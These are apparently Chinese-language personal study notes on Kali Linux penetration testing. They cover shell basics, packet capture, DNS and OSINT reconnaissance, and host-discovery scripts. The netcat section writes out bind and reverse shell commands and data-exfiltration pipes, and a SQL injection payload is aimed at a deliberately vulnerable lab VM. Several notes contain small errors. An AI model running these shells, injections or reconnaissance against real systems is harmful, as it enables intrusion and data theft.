
--基本操作-----------------------------------------------------------------------------------------------------
	ls	显示文件信息
		ls -l				显示文件详细	(d目录 -文件 c设备 l链接 b块)
		ls -a			显示隐藏文件
		ls -h			文件大小以KM等单位显示
		ls --sort=size		按大小排序
		ls --sort=time	按时间排序
	cd		进入目录
	pwd	当前目录
	cat		查看文件内容
	more	分屏查看文件内容
	less		分屏查看文件内容(不显示文件百分比)
	tail		显示文件最后10行
		tail -20 /var/log/message				显示文件最后20行
		watch -n 2 tail -20 /var/log/message	每隔2秒实时查看文件最后20行
	cp	复制
		cp -r A/ B	复制文件夹及所有内容
	rm	删除
		rm -r B 		删除文件夹及所有内容
	top	监视系统性能	输入k结束进程
	ps	查看进程信息
		ps -ef	查看进程信息
		ps aux	查看进程信息
	grep
		grep ss /etc/passwd	只显示文件中含有ss的信息
	ifconfig	查看网络信息
		ifconfig eth0 down					将网卡eth0关闭
		macchanger -m 00:11:11:11:11:11 eth0	修改网卡MAC地址
		ifconfig eth0 up						将网卡eth0开启
			/etc/resolv.conf文件配置网络信息
	netstat -pantu	在内核中访问网络连接状态及其相关信息的程序，它能提供TCP连接，TCP和UDP监听，进程内存管理的相关报告。
		netstat -pantu | egrep -v '0.0.0.0|:::'												不显示0.0.0.0和:::的信息
		netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}'								不显示0.0.0.0和:::的信息，只显示第5列
		netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}' | cut -d ':' -f 1					不显示0.0.0.0和:::的信息，只显示第5列，只显示冒号前面的信息
		netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}' | cut -d ':' -f 1 | sort				不显示0.0.0.0和:::的信息，只显示第5列，只显示冒号前面的信息，排序
		netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}' | cut -d ':' -f 1 | sort | uniq			不显示0.0.0.0和:::的信息，只显示第5列，只显示冒号前面的信息，排序，去重
		netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}' | cut -d ':' -f 1 | sort | uniq	 > ip	不显示0.0.0.0和:::的信息，只显示第5列，只显示冒号前面的信息，排序，去重，输出为ip文件
		netstat -pantu | egrep -v '0.0.0.0|:::' | awk '{print $5}' | cut -d ':' -f 1 | sort | uniq	 >> ip	不显示0.0.0.0和:::的信息，只显示第5列，只显示冒号前面的信息，排序，去重，输出为ip文件追加方式
	mount	挂载目录
		mount -o loop kali.iso /media/cdrom	
	dmesg	查看/var/log/message的信息
	find		查找
		find / -name nmap	查找根目录下所有含有nmap的文件
		find / -iname nmap	查找根目录下所有含有nmap的文件（不区分大小写）
		find . -name "ps*"		查找当前目录下含有ps的文件
		find . -name "ps* " -exec cp {} /tmp/{}.bak \;		将查找的文件复制到tmp
	whereis nmap	查找文件（索引）
		whereis -b nmap		查找文件（索引），二进制文件
		updatedb			更新索引
	echo	
	vi	编辑器
		vi ip	编辑ip文件	
		:set nu	显示行号
		:wq!	保存退出
		i		插入
		a		添加
		dd		删除一行
		o		当前下面插入一行
		y		复制当前行
		g		粘贴一行
	管道符号
		|		cat /etc/passwd | grep ssl	复制有ssl的行
		&		cd aaa & ls				前后依次执行
		&&		cd aaa && ls				如果前面的执行成功，后面的依次执行
		||		cd aaa || ls				如果前面的未执行成功，后面的依次执行
shell脚本
	1.sh
		#! /bin/bash
		echo -n "IP: "
		read ip
		echo "your ip is:"  $ip
	chmod +x 1.sh
	./1.sh
	
	99.sh
		#! /bin/bash
		for n in `seq 9`
		do
			for m in `seq $n`
			do
				echo -n "$m*$n="`expr $m \* $n`"	"
			done
			echo
		done
	
	ping.sh
		#! /bin/bash
		for n in `seq 254`
		do
			ping 192.168.1.$n -c 1 grep ttl | awk '{print $4}' | awk -F: '{print $1}'
		done
	
	
--更新
apt-get install linux-header-$(uname - r)
apt-get update
apt-get upgrade
apt-get dist-upgrade
apt-get install ibus ibus-pinyin flashplugin-nonfree gdebi geany meld netspeed mtr chromium 

--模拟环境配置-----------------------------------------------------------------------------------------------------
--暗网wiki
http://zqktlwi4fevo6ri.onion/wiki/index.php/Main_Page
--虚拟机下载地址
https://www.turnkeylinux.org/
--metasploit
https://metasploit.com
--模拟防火墙
http://m0n0.ch/wall/downloads.php


目标环境配置(centos)
	yum install httpd -y
	yum install -y mysql-server mysql mysql-deve
	yum install -y  php php-gd php-mbstring php-mysql

	service httpd start
	service mysqld start

	chkconfig httpd on
	chkconfig mysqld on

	mysql_install_db
	/usr/bin/mysqladmin -u root password '123'　　// 为root账号设置密码
	mysql_secure_installation 
	
	vi /var/www/html/phpinfo.php
		<?php phpinfo();?>

下载虚拟机metasploitable-linux-2.0.0(含有各种漏洞的虚拟机系统)
	sudo vim /var/www/mutillidae/config.inc 
		$dbname = 'owasp10';
	 owasp10 -> A1 -> SQLi -> User Info
		SQL注入		' or 1=1#

-----------------------------------------------------------------------------------------------------
NETCAT
	NC——telnet / banner
		nc -nv 1.1.1.1 80
	NC——传输文本信息
		A:	nc -l -p 333			A机器开放4444端口
		B:	nc -nv 1.1.1.1 333	B链接A机器4444端口
		A:	nc -l -p 333	> ps.txt						A机器开放4444端口
		B:	ls -l | nc -nv 192.168.100.142 333			B机器电子取证场景将信息传递
		B:	ps aux | nc -nv 192.168.100.142 333 -q 1		B机器电子取证场景将信息传递（q 等待1秒退出）
	NC——传输文件信息
		A:	nc -l -p 333	> 1.mp4						A机器开放4444端口
		B:	nc -nv 192.168.100.142 333 < 1.mp4 -q 1		B机器传递文件
		A:	nc -lp 333 < a.mp4 -q 1 					A机器开放4444端口，等待B机器接收文件
		B:	nc -nv192.168.100.142 333 > a.mp4			B机器接收文件
		A:	tar -cvf - aaa/ | nc -lp 333					A机器开放4444端口，等待B机器接收目录文件
		B:	nc -nv 192.168.100.142 333 | tar -xvf 			B机器传递目录文件
		A:	nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4						A机器开放4444端口，等待B机器接收文件（加密传输）
		B:	mcrypt --flush -Fbqd -a rijndael-256 -m ecb < 1.mp4 | nc -nv 192.168.100.142 333 -q 1		B机器传递文件
	NC——流媒体服务
		A:	cat 1.mp4 | nc -l -p 333								A机器开放4444端口
		B:	192.168.100.142 333 < mplayer -vo x11 -cache 3000 -		B机器传递文件
	NC——端口扫描
		nc -nvz 1.1.1.1 1-65535
		nc -vnzu 1.1.1.1 1-1024		UDP端口
	NC——远程克隆硬盘
		A:	nc -lp 333 | dd of=/dev/sda
		B:	dd -if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
	NC——远程控制
		A:	nc -lp 333 -c bash		--正向，Windwos把bash换成cmd
		B:	nc -nv 1.1.1.1 333
		A:	nc -lp 333				--反向
		B:	nc -nv  1.1.1.1 333 -c bash
	NC——NCAT
		A:	ncat ncat -c bash --allow 192.168.100.142 -vnl 333 --ssl
		B:	ncat -nv 1.1.1.1 333 --ssl
WIRESHARK
	抓包工具
TCPDUMP
	抓包，默认只抓前68个字节
		tcpdump -i eth0 -s 0 -w file.pcap
		tcpdump -i eth0 port 22
	读取抓包文件
		tcpdump -r file.pcap
		tcpdump -A -r file.pcap	ASCII格式显示包内容
		tcpdump -X -r file.pcap	二进制格式显示包内容
	筛选
		tcpdump -n -r http.cap |awk '{print $3}' | sort -u
		tcpdump -n src host 1.1.1.1 -r http.cap
		tcpdump -n dst host 1.1.1.1 -r http.cap
		tcpdump -n port 53 -r http.cap
		tcpdump -nX port 80 -r http.cap
	高级筛选
		tcpdump -A -n 'tcp[13]=24' -r http.cap
过程文档记录工具
	dradis
	keepnote
	truecrypt
-----------------------------------------------------------------------------------------------------
被动信息收集
	信息收集内容
		IP地址
		域名信息
		邮件地址
		文档图片数据
		公司地址
		公司组织架构
		联系电话、传真号码
		人员姓名、职务
		目标系统使用的技术架构
		公开的商业信息
	信息用途
		用信息描述目标
		发现
		社会工程学攻击
		屋里缺口
信息收集
	DNS信息收集——DNS
		域名记录：A、C name、NS、MX、PTR
	DNS信息收集——NSLOOKUP	
		nslookup
		www.baidu.com
		set type=mx		type有a、mx、ns、any、ptr
		baidu.com
		set q=ptr		type简写为q，反向查询
		180.76.13.18
		server 8.8.8.8		设置域名服务器地址
		nslookup -q=any baidu.com	可以写成一行
	DNS信息收集——DIG
		dig @8.8.8.8 www.sina.com mx
		dig baidu.com any
		dig +noall +answer baidu.com any		noall全都不显示，answer只看answer
		dig -x 202.181.14.157					反向查询
		dig +noall +answer txt chaos VERSION_BIND @ns3.dnsv4.com		查看bind版本
		dig +trace baidu.com				DNS追踪
	DNS区域传输
		dig @ns1.example.com example.com axfr
		host -T -l sina.com 8.8.8.8
	DNS字典爆破
		fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist /usr/share/fierce/hosts.txt					查询安装情况dpkg -L fierce
		dnsdict6 -d4 -t 16 -x sina.com																并发16，x级别
		dnsenum -f /usr/share/dnsenum/dns.txt -dnsserver 8.8.8.8 sina.com -o sina.xml
		dnsmap sina.com -w /usr/share/dnsmap/wordlist_TLAs.txt 									速度慢
		dnsrecon -d sina.com --lifetime 10 -t brt -D /usr/share/dnsrecon/namelist.txt
		dnsrecon -t std -d sina.com																std标准方式
	DNS注册信息
		whois sina.com
		whois -h whois.apnic.net 192.0.43.10
			www.apnic.net
			www.internic.net
	SHODAN
		搜索联网设备
		Banner：http、ftp、ssh、telnet
		https://www.shodan.io
		常见filter
			net
			city
			country
			port
			os
			hostname
			server
		示例
			net 8.8.8.8
			country:CN net:218.62.14.0/24 port:22
			city:Harbin net:125.211.217.0/24 HTTP/1.1 403
	google搜索
		https://www.exploit-db.com/google-hacking-database		谷歌搜索关键字大全
		https://www.yandex.com		俄罗斯搜索引擎
	用户信息
		theharvester -d sina.com -l 300 google
		metagoofil -d microsoft.com -t pdf -l 200 -o test -f 1.html
	MELTAGO
	一个保存网站历史版本信息的网站	http://www.archive.org/
	个人专属的密码字典
		cupp——common user password profiler
			git clone https://github.com/Mebus/cupp.git
			python cup.py -i
	查看图片信息
		exif w.jpg
		exiftool w.jpg
		foca
	recon-ng
		workspaces list
		keys list
		shell ls
		show options
		set USER-AGENT 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1'
		unset USER-AGENT
		show schema		查看数据库表
		snapshots list		查看数据库快照
		snapshots take		创建数据库快照

		search google
		use recon/domains-hosts/google_site_web
		show option
		set SOURCE 163.com
		run

		search baidu
		use recon/domains-hosts/baidu_site_web
		show option
		set SOURCE 163.com
		run

		show hosts			查看host表
		query select * from hosts	查看host表

		search brut			暴力破解
		use recon/domains-hosts/brute_hosts
		show option
		set SOURCE 163.com
		run

		search resolve			解析IP
		use recon/hosts-hosts/resolve
		show option
		show info
		set SOURCE query select host from hosts
		run

		search report
		use reporting/html
		show option
		set CREATOR aaa
		set CUSTOMER 163
		run
-----------------------------------------------------------------------------------------------------
主动信息收集
	二层发现——速度快、可靠、不可路由、arp协议
		arping
			arping 192.168.1.1 -c 1

			arp1.sh：	
			#!/bin/bash
			if ["$#" -ne 1]
			then
				echo "Usage : ./arping1.sh [Interface]"
				exit
			fi
			interface=$1
			prefix=$(ifconfig $interface | grep 'inet '| cut -d 't' -f 2 | cut -d ' ' -f 2 | cut -d '.' -f 1-3)
			for addr in $(seq 1 254)
			do
				arping -c 1 $prefix.$addr | grep "bytes from" | cut -d " " -f 5 | cut -d "(" -f 2 | cut -d ")" -f 1
			done

			apr2.sh：
			#!/bin/bash
			if ["$#" -ne 1]
			then
				echo "Usage : ./arping2.sh [filename]"
				exit
			fi
			file=$1
			for addr in $(cat $file)
			do
				arping -c 1 $addr | grep "bytes from" | cut -d " " -f 5 | cut -d "(" -f 2 | cut -d ")" -f 1
			done

			arp1.py
			#!/usr/bin/python
			import logging
			import subprocess
			logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
			from scapy.all import*
			if len(sys.argv)!=2:
				print"Usage : ./arp1.py [interface]"
				sys.exit()
			interface=str(sys.argv[1])
			ip=subprocess.check_output("ifconfig "+interface+" | grep 'inet '| cut -d 't' -f 2 | cut -d ' ' -f 2 | cut -d '.' -f 1-3",shell=True).strip()
			prefix=ip.split('.')[0]+'.'+ip.split('.')[1]+'.'+ip.split('.')[2]+'.'
			for addr in range(0,254):
				answer=sr1(ARP(pdst=prefix+str(addr)),timeout=0.1,verbose=0)
				if answer==None:
					pass
				else:
					print prefix+str(addr)
			
			arp2.py
				import logging
				logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
				from scapy.all import*
				if len(sys.argv)!=2:
					print"Usage : ./arp2.py [filename]"
					sys.exit()
				filename=str(sys.argv[1])
				file=open(filename,'r')
				for addr in file:
					answer=sr1(ARP(pdst=addr.strip()),timeout=0.1,verbose=0)
					if answer==None:
						pass
					else:
						print addr.strip()

		nmap
			nmap -sn 192.168.1.129
			nmap -sn 192.168.1.0/24
			nmap -iL iplist.txt -sn
		
		netdiscover
			主动
			netdiscover -i eth0 -r 192.168.1.0/24
			netdiscover -i iplist.txt
			被动
			netdiscover -p

		scapy
			apt-get install python-gnuplot
			ARP().display()
			arp=ARP()
			arp.pdst='192.168.1.1'		设置信息
			arp.display()				查看信息
			sr1(arp)					发包
			answer=sr1(arp)
			answer.display()
			
			sr1(ARP(pdst='192.168.1.1'),timeout=1,verbose=1)
			
	三层发现——速度快、可路由、经常被边界防火墙过滤、ip,icmp协议
		ping 192.168.1.129 -c 2
		traceroute www.163.com
		scapy
			i=IP()
			p=ICMP()
			ping=(i/p)
			ping.display()
			ping[IP].dst='192.168.1.1'
			ping.display()
			answer=sr1(ping)
			answer.display()
			
			sr1(IP(dst='192.168.1.1')/ICMP(),timeout=1,verbose=1)
		
		nmap
			nmap -sn 202.97.224.0/24

		fping 
			fping 192.168.1.1
			fping -g 192.168.1.100 192.168.1.200

		hping
			hping3 192.168.1.1 --icmp -c 2
			for addr in $(seq 1 254):do hping3 192.168.1.$addr --icmp -c 1 >> handle.txt & done

	四层发现——结果可靠，不可能被防火墙过滤，全端口扫描速度慢、TCP/UDP













